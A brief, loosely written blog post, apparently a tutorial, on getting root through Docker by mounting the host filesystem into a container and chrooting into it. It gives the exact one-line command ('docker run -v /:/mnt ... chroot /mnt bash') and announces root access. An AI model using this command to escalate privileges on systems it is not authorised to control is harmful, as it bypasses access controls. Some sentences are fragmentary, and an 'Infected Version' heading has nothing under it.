1 min read

Docker Engine privilages escalation


looking into docker normal usage as example

docker run hello-world

This command downloads a test image and runs it in a container. When the container runs, it prints an informational message and exits.

we got the priv

 to execute it …
docker run -v /:/mnt --rm -it ubuntu chroot /mnt bash

Parameter -v will create volume in docker instance , Parameter -it makes docker in shell mode instead of daemon process.

and we are root !

Infected Version :

Linux post-installation steps for Docker Engine
Find the recommended Docker Engine post-installation steps for Linux users, including how to run Docker as a non-root user and more.
docker | GTFOBins